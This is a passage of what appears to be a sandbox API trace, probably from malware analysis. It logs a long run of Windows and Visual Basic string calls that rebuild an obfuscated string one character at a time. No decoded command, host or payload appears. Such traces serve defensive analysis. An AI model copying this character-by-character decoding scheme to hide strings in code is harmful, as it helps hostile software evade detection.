cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.902] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.903] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.903] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.904] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.904] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.904] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.904] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.905] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.905] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.905] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.905] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.906] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.906] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.906] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.907] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.907] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.907] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.908] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.908] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.908] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.908] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.909] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.909] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.909] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.910] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.910] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.910] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.910] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.911] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0084.912] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.912] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.912] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.913] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.913] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.913] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.913] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.914] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.914] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.914] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.914] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.915] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.915] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.916] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.916] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0084.917] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.917] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0084.917] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.917] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.917] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.918] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.918] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.918] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.919] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.919] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.919] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.919] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.920] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.920] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.920] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.920] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.921] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.921] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.921] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.921] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.921] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.921] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.922] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.922] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.922] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.922] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.923] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.923] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.923] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0084.923] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.923] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.923] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.924] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.924] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.924] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.924] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.924] VarSub (in: pvarLeft=0x28f6a4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe56ef4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.925] VarCat (in: pvarLeft=0x28f574, pvarRight=0x28f4e4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.985] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.985] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.985] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.985] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ƒ", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x83", lpUsedDefaultChar=0x0) returned 1 [0084.986] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="v", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="v") returned 1 [0084.986] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.986] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.986] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.986] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.987] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.987] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.987] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.987] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="n", lpUsedDefaultChar=0x0) returned 1 [0084.988] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="a", cbMultiByte=1, lpWideCharStr=0xe4a9ec, cchWideChar=1 | out: lpWideCharStr="a") returned 1 [0084.988] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.988] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.988] VarSub (in: pvarLeft=0x28f584, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.988] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe56ecc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.989] VarCat (in: pvarLeft=0x28f634, pvarRight=0x28f534, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="O", cchWideChar=1, lpMultiByteStr=0x28f2ca, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O", lpUsedDefaultChar=0x0) returned 1 [0084.990] VarAdd (in: pvarLeft=0x28f5e4, pvarRight=0x28f48c, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.990] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.990] VarCat (in: pvarLeft=0x28f644, pvarRight=0x28f5f4, pvarResult=0x28f4bc | out: pvarResult=0x28f4bc) returned 0x0 [0084.990] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="T", cchWideChar=1, 